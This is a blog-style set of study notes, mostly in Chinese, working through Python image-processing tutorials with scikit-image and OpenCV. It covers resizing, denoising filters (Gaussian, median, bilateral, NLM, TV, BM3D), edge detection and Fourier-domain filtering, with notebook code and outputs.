    • Downscale 的目的是通过整数因子对 n 维图像进行下采样,使用作为函数参数的大小因子的每个块的元素的局部均值。
    1
    2
    3
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    1
    2
    3
    4
    5
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    1
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>

    png

    1
    plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>

    png

    1
    plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>

    png

    1
    2
    img_downscaled = downscale_local_mean(img, (4, 3))  # 拉伸
    plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>

    png

    gaussian 模糊

    1
    2
    3
    4
    5
    6
    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
    C:\Users\gzjzx\anaconda3\envs\wxpython37\lib\site-packages\skimage\_shared\utils.py:348: RuntimeWarning: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.  return func(*args, **kwargs)<matplotlib.image.AxesImage at 0x212dbb52848>

    png

    sobel 边缘检测

    1
    2
    3
    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>

    png
    ## Tutorial 30 - Basic image processing using opencv in python

    使用 OpenCV 操作下面这张图:

    jpg

    OpenCV 读取到的都是 BGR 颜色通道, 此时使用 matplotlib 显示会导致颜色发生变化

    1
    2
    3
    4
    5
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>

    png

    缩放

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1)
    resized = cv2.resize(img, None, fx=2, fy=2, interpolation=cv2.INTER_CUBIC)

    cv2.imshow('original pic', img)
    cv2.imshow('resized pic', resized)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    1
    img.shape
    (400, 200, 3)
    1
    2
    3
    4
    print('Top left', img[0, 0])
    print('Top right', img[0, -1])
    print('Bottom left', img[-1, 0])
    print('Bottom right', img[-1, -1])
    Top left [254   0   0]Top right [  1 255 255]Bottom left [  1 255   0]Bottom right [ 42   0 255]

    分离颜色通道

    1
    2
    3
    blue = img[:, :, 0]
    green = img[:, :, 1]
    red = img[:, :, 2]

    1
    blue, green, red = cv2.split(img)
    1
    2
    3
    cv2.imshow('red pic', red)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    合并颜色通道

    1
    2
    3
    4
    5
    img_merged = cv2.merge((blue, green, red))

    cv2.imshow('merged pic', img_merged)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Canny 边缘检测

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import cv2

    img = cv2.imread('images/Osteosarcoma_01.tif', 0)
    edges = cv2.Canny(img, 100, 200)

    cv2.imshow('Original Image', img)
    cv2.imshow('Canny', edges)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 31 - Image filtering in python - Unsharp mask

    Unsharp Mask(USM)锐化算法的的原理及其实现。_大熊背的博客-CSDN 博客_usm 锐化算法

    png

    $Unsharpened image = original + amount \times (original - blurred)$

    原理

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    from skimage import io, img_as_float
    from skimage.filters import unsharp_mask
    from skimage.filters import gaussian

    img = img_as_float(io.imread('images/sandstone_blur_2sigma.tif', as_gray=True))
    gaussian_img = gaussian(img, sigma=2, mode='constant', cval=0.0)
    img2 = (img - gaussian_img) * 2.
    img3 = img + img2

    from matplotlib import pyplot as plt

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('1st')

    ax2 = fig.add_subplot(132)
    ax2.imshow(img2, cmap='gray')
    ax2.title.set_text('img2')

    ax3 = fig.add_subplot(133)
    ax3.imshow(img3, cmap='gray')
    ax3.title.set_text('img3')

    plt.show()

    png

    unsharp_mask 函数

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    from skimage import io
    from skimage.filters import unsharp_mask

    img = io.imread("images/sandstone_blur_2sigma.tif")

    #Radius defines the degree of blurring
    #Amount defines the multiplication factor for original - blurred image
    unsharped_img = unsharp_mask(img, radius=3, amount=2)


    import matplotlib.pyplot as plt
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(1,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(1,2,2)
    ax2.imshow(unsharped_img, cmap='gray')
    ax2.title.set_text('Unsharped Image')

    png

    Tutorial 32 - Image filtering in python - Gaussian denoising for noise reduction

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import cv2
    from skimage import io, img_as_float
    from skimage.filters import gaussian

    img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
    img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))

    img = img_gaussian_noise

    gaussian_using_cv2 = cv2.GaussianBlur(img, (3,3), 0, borderType=cv2.BORDER_CONSTANT)

    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    #sigma defines the std dev of the gaussian kernel. SLightly different than
    #how we define in cv2


    cv2.imshow("Original", img)
    cv2.imshow("Using cv2gaussian", gaussian_using_cv2)
    cv2.imshow("Using skimage", gaussian_using_skimage)
    #cv2.imshow("Using scipy2", conv_using_scipy2)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 33 - Image filtering in python - Median filter for denoising images

    • 中值滤波清理椒盐噪声

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    import cv2
    # Needs 8 bit, not float.
    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img_salt_pepper_noise = cv2.imread('images/Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 0)

    img = img_gaussian_noise

    median_using_cv2 = cv2.medianBlur(img, 3)

    skimage

    1
    2
    3
    4
    5
    6
    7
    8
    9
    from skimage.filters import median
    from skimage.morphology import disk

    """
    Disk creates a circular structuring element,
    similar to a mask with specific radius
    Disk 创建一个圆形结构元素,类似于具有特定半径的掩码
    """
    disk(3)
    array([[0, 0, 0, 1, 0, 0, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [1, 1, 1, 1, 1, 1, 1],       [0, 1, 1, 1, 1, 1, 0],       [0, 1, 1, 1, 1, 1, 0],       [0, 0, 0, 1, 0, 0, 0]], dtype=uint8)
    1
    median_using_skimage = median(img, disk(3), mode='constant', cval=0.0)
    1
    2
    3
    4
    5
    6
    cv2.imshow('Original', img)
    cv2.imshow('cv2median', median_using_cv2)
    cv2.imshow('Using skimage median', median_using_skimage)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 34 - Image filtering in python - Bilateral filter for image denoising

    双边滤波 - Bilateral Filter - 知乎 (zhihu.com)

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_cv2 = cv2.bilateralFilter(img, 5, 20, 100, borderType=cv2.BORDER_CONSTANT)

    cv2.imshow("Original", img)
    cv2.imshow("cv2 bilateral", bilateral_using_cv2)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Skimage

    视频上说很慢…好像确实挺慢

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import cv2
    from skimage.restoration import denoise_bilateral

    img_gaussian_noise = cv2.imread('images/Osteosarcoma_01_25Sigma_noise.tif', 0)
    img = img_gaussian_noise
    bilateral_using_skimage = denoise_bilateral(img, sigma_color=0.05, sigma_spatial=15,
    multichannel=False)
    cv2.imshow("Using skimage bilateral", bilateral_using_skimage)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 35 - Image filtering in python - Non-local means -NLM- filter for image denoising

    NLM 去噪算法_SongpingWang 的博客-CSDN 博客_nlm 去噪

    png

    OpenCV

    1
    2
    3
    4
    5
    6
    7
    import cv2
    import numpy as np
    from skimage import io, img_as_float
    from skimage.restoration import denoise_nl_means, estimate_sigma

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=False))
    sigma_est = np.mean(estimate_sigma(img, multichannel=True)) # 从所有三个通道中选取 Sigma
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\3289355486.py:7: FutureWarning: `multichannel` is a deprecated argument name for `estimate_sigma`. It will be removed in version 1.0. Please use `channel_axis` instead.  sigma_est = np.mean(estimate_sigma(img, multichannel=True))
    1
    2
    3
    4
    5
    denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, 
    fast_mode=True,
    patch_size=5,
    patch_distance=3,
    multichannel=False)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_11200\4037562389.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_nl_means`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
    1
    2
    3
    4
    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    Skimage

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    from skimage import img_as_ubyte
    import cv2

    img_as_8btype = img_as_ubyte(img)
    denoise_img_as_8byte = img_as_ubyte(denoise_img)

    original_img = cv2.cvtColor(img_as_8btype, cv2.COLOR_BGR2RGB)
    final_denoised_img = cv2.cvtColor(denoise_img_as_8byte, cv2.COLOR_BGR2RGB)

    cv2.imshow("Original", img)
    cv2.imshow("NLM Filtered", denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 36 - Image filtering in python - Total variation filter -TVF- for image denoising

    如何理解全变分(Total Variation,TV)模型?- 知乎 (zhihu.com)

    1
    2
    3
    4
    5
    import cv2
    from skimage import io, img_as_float
    from skimage.restoration import denoise_tv_chambolle

    img = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif'))
    1
    2
    3
    import matplotlib.pyplot as plt

    plt.hist(img.flat, bins=100, range=(0, 1))
    (array([3.26417e+05, 3.28804e+05, 2.18786e+05, 3.22133e+05, 2.09763e+05,        3.05641e+05, 1.95677e+05, 2.78984e+05, 1.75691e+05, 2.45767e+05,        2.25122e+05, 1.37699e+05, 1.89186e+05, 1.14683e+05, 1.55440e+05,        9.30000e+04, 1.23786e+05, 7.34830e+04, 9.66150e+04, 5.74190e+04,        7.61160e+04, 6.49060e+04, 3.82890e+04, 5.08860e+04, 2.99340e+04,        4.02660e+04, 2.39850e+04, 3.23250e+04, 1.93770e+04, 2.62200e+04,        2.38270e+04, 1.45560e+04, 1.99740e+04, 1.24720e+04, 1.74630e+04,        1.06820e+04, 1.50500e+04, 9.49200e+03, 1.31800e+04, 8.33400e+03,        1.13970e+04, 1.06840e+04, 6.63100e+03, 9.49100e+03, 5.84100e+03,        8.29500e+03, 5.25100e+03, 7.20200e+03, 4.53600e+03, 6.35800e+03,        5.76500e+03, 3.56300e+03, 4.89500e+03, 3.01000e+03, 4.29100e+03,        2.55100e+03, 3.53500e+03, 2.23300e+03, 3.10300e+03, 1.92100e+03,        2.55900e+03, 2.31500e+03, 1.38900e+03, 1.87300e+03, 1.18800e+03,        1.62500e+03, 9.85000e+02, 1.37700e+03, 8.49000e+02, 1.17400e+03,        1.06500e+03, 6.06000e+02, 8.26000e+02, 5.57000e+02, 7.52000e+02,        4.27000e+02, 5.95000e+02, 3.91000e+02, 4.85000e+02, 3.13000e+02,        4.03000e+02, 3.87000e+02, 2.18000e+02, 3.35000e+02, 1.88000e+02,        2.95000e+02, 1.65000e+02, 2.55000e+02, 1.36000e+02, 2.35000e+02,        1.82000e+02, 1.15000e+02, 1.68000e+02, 1.13000e+02, 1.63000e+02,        1.13000e+02, 1.63000e+02, 9.40000e+01, 1.32000e+02, 1.18000e+02]), array([0.  , 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1 ,        0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19, 0.2 , 0.21,        0.22, 0.23, 0.24, 0.25, 0.26, 0.27, 0.28, 0.29, 0.3 , 0.31, 0.32,        0.33, 0.34, 0.35, 0.36, 0.37, 0.38, 0.39, 0.4 , 0.41, 0.42, 0.43,        0.44, 0.45, 0.46, 0.47, 0.48, 0.49, 0.5 , 0.51, 0.52, 0.53, 0.54,        0.55, 0.56, 0.57, 0.58, 0.59, 0.6 , 0.61, 0.62, 0.63, 0.64, 0.65,        0.66, 0.67, 0.68, 0.69, 0.7 , 0.71, 0.72, 0.73, 0.74, 0.75, 0.76,        0.77, 0.78, 0.79, 0.8 , 0.81, 0.82, 0.83, 0.84, 0.85, 0.86, 0.87,        0.88, 0.89, 0.9 , 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98,        0.99, 1.  ]), <BarContainer object of 100 artists>)

    png

    • denoise_tv_chambolle(image, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=False)
      • weight: The greater weight, the more denoising (at the expense of fidelity to input). 权重越大,去噪越多(以牺牲对输入的保真度为代价)。
      • eps: Relative difference of the value of the cost function that determines the stop criterion. 决定停止准则的代价函数值的相对差值。
      • n_iter_max: Max number of iterations used for optimization 用于优化的最大迭代次数
    1
    denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_8228\1044631449.py:1: FutureWarning: `multichannel` is a deprecated argument name for `denoise_tv_chambolle`. It will be removed in version 1.0. Please use `channel_axis` instead.  denoise_img = denoise_tv_chambolle(img, weight=0.1, eps=0.0002, n_iter_max=200, multichannel=True)
    1
    2
    3
    4
    cv2.imshow('Original', img)
    cv2.imshow('TV Filtered', denoise_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 37 - Image filtering in python - Block matching and 3D filtering -BM3D- for image denoising

    BM3D 算法学习 - 知乎

    png

    1
    pip install bm3d
    Collecting bm3d  Downloading bm3d-3.0.9-py3-none-any.whl (8.4 MB)     ---------------------------------------- 8.4/8.4 MB 2.3 MB/s eta 0:00:00Requirement already satisfied: PyWavelets in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.3.0)Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.23.1)Requirement already satisfied: scipy in c:\users\gzjzx\anaconda3\lib\site-packages (from bm3d) (1.9.0)Installing collected packages: bm3dSuccessfully installed bm3d-3.0.9Note: you may need to restart the kernel to use updated packages.
    1
    2
    3
    4
    5
    6
    7
    from skimage import io, img_as_float
    import bm3d
    import cv2

    noisy_img = img_as_float(io.imread("images/Osteosarcoma_01_25Sigma_noise.tif", as_gray=True))

    BM3D_denoised_image = bm3d.bm3d(noisy_img, sigma_psd=0.2, stage_arg=bm3d.BM3DStages.HARD_THRESHOLDING)
    • bm3d library is not well documented yet, but looking into source code…Bm3d 库还没有很好的文档化,但是查看源代码…
      • sigma_psd - noise standard deviation 噪声标准差
      • stage_arg: Determines whether to perform hard-thresholding or Wiener filtering. 确定是执行硬阈值还是维纳过滤。
      • stage_arg = BM3DStages.HARD_THRESHOLDING or BM3DStages.ALL_STAGES (slow but powerful)
        • BM3DStages。HARD_THRESHOLDING 或 BM3DStagesall_stage(缓慢但强大)

    All stages performs both hard thresholding and Wiener filtering. 所有阶段都执行硬阈值和维纳滤波。

    1
    2
    3
    4
    cv2.imshow("Original", noisy_img)
    cv2.imshow("Denoised", BM3D_denoised_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 38 - Image filtering in python - Edge detection

    Edge Detection filters: 边缘检测滤波器

    • Roberts
      • Apply a horizontal and vertical filter one after the other. 依次使用 Horizontal 和 Vertical 滤镜。
      • Both filters are applied (convoluted) to the image. 两个过滤器都被应用到图像上(卷积)。
      • Computes the sum of the squares of the differences between diagonally adjacent pixels. 计算对角线相邻像素之间的差的平方和。
      • It highlights regions of high spatial which often correspond to edges. 它突出了高空间区域,通常对应于边缘。

    png

    • Sobel
      • Very similar to Roberts excerpt with a $3\times3$ operator. 与 Roberts 非常相似,只是使用了$3\times3$操作符

    png

    • Scharr
      • Typically used to identify gradients along the x-axis (dx=1, dy=0) and y-axis(dx=0, dy=1) independently. 通常用于分别识别沿 x 轴(dx=1, dy=0)和 y 轴(dx=0, dy=1)的梯度。
      • Performance is quite similar to Sobel filter. 其性能与 Sobel 滤波器非常相似。
    • Farid
      • Farid and Simoncelli propose to use a pair of kernels, one for interpolation and another for differentiation (similar to Sobel). Farid 和 Simoncelli 建议使用一对核,一个用于插值,另一个用于微分(类似于 Sobel)。
      • Fixed size kernels: $5\times5$ (interpolation) and $7\times7$ (differentiation) 固定大小的内核:$5\times5$(插值)和$7\times7$(分化)
    • Prewitt
      • The Prewitt operator is similar to Sobel, excerpt for the operator values.
      • Very fast, similar to Sobel.

    png

    1
    2
    3
    import cv2

    img = cv2.imread('images/sandstone.tif', 0)

    png

    1
    2
    3
    4
    5
    6
    from skimage.filters import roberts, sobel, scharr, prewitt

    roberts_img = roberts(img)
    sobel_img = sobel(img)
    scharr_img = scharr(img)
    prewitt_img = prewitt(img)
    1
    2
    3
    4
    5
    6
    cv2.imshow("Roberts", roberts_img)
    cv2.imshow("Sobel", sobel_img)
    cv2.imshow("Scharr", scharr_img)
    cv2.imshow("Prewitt", prewitt_img)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 39 - Image filtering in python - Edge detection using Canny

    • Multi stage algorithm for edge detection: 多阶段边缘检测算法
      • Step 1: Noise reduction - typically uses Gaussian (but any denoising can be used) 降噪-通常使用高斯(但也可以使用任何降噪)
      • Step 2: Gradient calculation - detect edges, typically along 4 directions, horizontal, vertical, and two diagonals. (e.g. use Sobel) 梯度计算-检测边缘,通常沿 4 个方向,水平,垂直和两个对角线。
        (如使用 Sobel)
      • Step 3: Non-maximum suppression - thin out edges by finding pixels with max value in the edge direction. 非最大抑制-通过在边缘方向上找到最大值像素来减少边缘。
      • Step 4: Double threshold - determines potential edges by double thresholding to obtain strong, weak and irrelevant pixels for edges. 双阈值-通过双阈值确定潜在的边缘,获得边缘的强、弱和无关像素。
      • Step 5: Edge tracking by hysteresis - covert weak edge pixels to strong based on neighboring pixels. 边缘跟踪的迟滞-隐藏弱边缘像素到强基于邻近像素。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    from skimage import io, filters, feature
    import matplotlib.pyplot as plt
    from skimage.color import rgb2gray
    import cv2
    import numpy as np


    img = cv2.imread('images/sandstone.tif', 0)

    #Canny
    canny_edge = cv2.Canny(img, 50, 80) #Supply Thresholds 1 and 2

    #Autocanny
    sigma = 0.3
    median = np.median(img)

    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - sigma) * median))
    #Lower threshold is sigma % lower than median
    #If the value is below 0 then take 0 as the value

    upper = int(min(255, (1.0 + sigma) * median))
    #Upper threshold is sigma% higher than median
    #If the value is larger than 255 then take 255 a the value

    auto_canny = cv2.Canny(img, lower, upper)


    cv2.imshow("Canny", canny_edge)
    cv2.imshow("Auto Canny", auto_canny)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    Tutorial 40 - What is Fourier transform and how is it relevant for image processing

    Fourier Transform

    png

    • Continuous Fourier transform

      $X(f)=\int_{-\infty}^{\infty} x(t)\cdot e^{-j 2\pi f t}\,dt$

    • Discrete Fourier transform

      $X(k) = \frac{1}{N} \sum_{n=0}^{N-1} x({\color{Red}n}) \cdot e^{-{\color{Blue}j}\,2\pi k n / N}$

      • $x({\color{Red}n})$: the input signal (pixel values)
      • ${\color{Blue}j}$: the imaginary unit (complex number)
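
    A quick numerical check of the discrete formula against numpy (a minimal sketch; np.fft.fft uses the un-normalized convention, so we divide by N by hand to match the $\frac{1}{N}$ factor above):

    import numpy as np

    x = np.array([1.0, 2.0, 3.0, 4.0])   # a tiny input signal
    N = len(x)

    # evaluate the sum straight from the definition
    k = np.arange(N).reshape(-1, 1)
    n = np.arange(N).reshape(1, -1)
    X_manual = (x * np.exp(-2j * np.pi * k * n / N)).sum(axis=1) / N

    print(np.allclose(X_manual, np.fft.fft(x) / N))   # True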

    Code

    • Create a sine wave
    import cv2
    import matplotlib.pyplot as plt
    import numpy as np
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 3) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a404a700>

    png

    # Change the frequency
    # Generate a 2D sine wave image
    x = np.arange(256) # generate values from 0 to 255 (our image size)
    y = np.sin(2 * np.pi * x / 30) # calculate sine of x values
    # Divide by a smaller number above to increase the frequency.
    y += max(y) # offset sine wave by the max value to go out of negative range of sine

    # Generate a 256 * 256 image (2D array of the sine wave)
    # create 2-D array of sine-wave
    img = np.array([[y[j] * 127 for j in range(256)] for i in range(256)], dtype=np.uint8)

    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x246a542f1c0>

    png

    OpenCV

    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)

    #Shift DFT. First check the output without the shift
    #Without shifting the data would be centered around origin at the top left
    #Shifting it moves the origin to the center of the image.
    dft_shift = np.fft.fftshift(dft)

    #Calculate magnitude spectrum from the DFT (Real part and imaginary part)
    #Added 1 as we may see 0 values and log of 0 is indeterminate
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)


    #As the spatial frequency increases (bars closer),
    #the peaks in the DFT amplitude spectrum move farther away from the origin

    #Center represents low frequency and the corners high frequency (with DFT shift).
    #To build high pass filter block center corresponding to low frequencies and let
    #high frequencies go through. This is nothing but an edge filter.
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    In the image on the right, for every point:

    1) its distance from the center encodes the spatial frequency,

    2) the direction from the center to the point is the direction of the plane wave,

    3) the gray value at that point encodes the amplitude.
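
    These three statements can be checked numerically on the synthetic sine image built above: its spectrum should show two symmetric peaks whose distance from the center equals the number of cycles across the image. A minimal sketch (reusing the img variable from the code above):

    import numpy as np

    f = np.fft.fftshift(np.fft.fft2(np.float32(img)))
    mag = np.abs(f)

    rows, cols = img.shape
    mag[rows // 2, cols // 2] = 0   # ignore the DC component at the center

    peak = np.unravel_index(np.argmax(mag), mag.shape)
    dist = np.hypot(peak[0] - rows // 2, peak[1] - cols // 2)
    print(dist)   # close to 256/30 ≈ 8.5 - the peak lands on the nearest integer frequency bin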

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    dft_shift = np.fft.fftshift(dft)
    magnitude_spectrum = 20 * np.log((cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))+1)

    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img)
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum)
    ax2.title.set_text('FFT of image')
    plt.show()

    png

    Tutorial 41 - Image filtering using Fourier transform in python

    import cv2
    from matplotlib import pyplot as plt
    import numpy as np

    img = cv2.imread('images/sandstone.tif', 0) # load an image
    • Output is a 2D complex array: the 1st channel holds the real part and the 2nd the imaginary part.
    • For the FFT in OpenCV, the input image needs to be converted to float32.
    dft = cv2.dft(np.float32(img), flags=cv2.DFT_COMPLEX_OUTPUT)
    • Rearranges a Fourier transform X by shifting the zero-frequency component to the center of the array.
    • Otherwise it starts at the top-left corner of the image (array).
    dft_shift = np.fft.fftshift(dft)
    • The magnitude of the spectrum is 20·log(abs(f)).
    • For values that are 0 we may end up with indeterminate values for the log.
    • So we can add 1 to the array to avoid a warning.
    magnitude_spectrum = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]) + 1)
    • Edge detection using the Fourier transform

    • Circular HPF mask: the center circle is 0, the rest all ones.

    • Can be used for edge detection, because the low frequencies at the center are blocked and only high frequencies pass through.

    • Edges are high-frequency components.

    • Amplifies noise.
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.ones((rows, cols, 2), np.uint8)
    r = 80
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 0
    • Apply the mask and inverse DFT: multiply the Fourier-transformed image with the mask values.
    fshift = dft_shift * mask
    • Get the magnitude spectrum (for plotting purposes only).
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_19060\199016683.py:1: RuntimeWarning: divide by zero encountered in log  fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    • Inverse shift to move the origin back to the top left.
    f_ishift = np.fft.ifftshift(fshift)
    • Inverse DFT to convert back from the frequency domain to the image domain.
    • The result will be complex numbers.
    img_back = cv2.idft(f_ishift)
    • Magnitude spectrum of the image domain.
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    • Plotting
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()

    png

    • Circular LPF mask: the center circle is 1, the rest all zeros.
    • Only allows low-frequency components through - smooth regions.
    • Can smooth out noise, but blurs edges.
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r = 100
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = (x - center[0]) ** 2 + (y - center[1]) ** 2 <= r*r
    mask[mask_area] = 1

    # Band Pass Filter - concentric circle mask: only the points inside the ring are ones
    # (note: this overwrites the LPF mask above, so only the band-pass mask is applied below)
    rows, cols = img.shape
    crow, ccol = int(rows / 2), int(cols / 2)

    mask = np.zeros((rows, cols, 2), np.uint8)
    r_out = 80
    r_in = 10
    center = [crow, ccol]
    x, y = np.ogrid[:rows, :cols]
    mask_area = np.logical_and(((x - center[0]) ** 2 + (y - center[1]) ** 2 >= r_in ** 2),
    ((x - center[0]) ** 2 + (y - center[1]) ** 2 <= r_out ** 2))
    mask[mask_area] = 1
    fshift = dft_shift * mask
    fshift_mask_mag = 20 * np.log(cv2.magnitude(fshift[:, :, 0], fshift[:, :, 1]))
    f_ishift = np.fft.ifftshift(fshift)
    img_back = cv2.idft(f_ishift)
    img_back = cv2.magnitude(img_back[:, :, 0], img_back[:, :, 1])
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(magnitude_spectrum, cmap='gray')
    ax2.title.set_text('FFT of image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(fshift_mask_mag, cmap='gray')
    ax3.title.set_text('FFT + Mask')
    ax4 = fig.add_subplot(2,2,4)
    ax4.imshow(img_back, cmap='gray')
    ax4.title.set_text('After inverse FFT')
    plt.show()
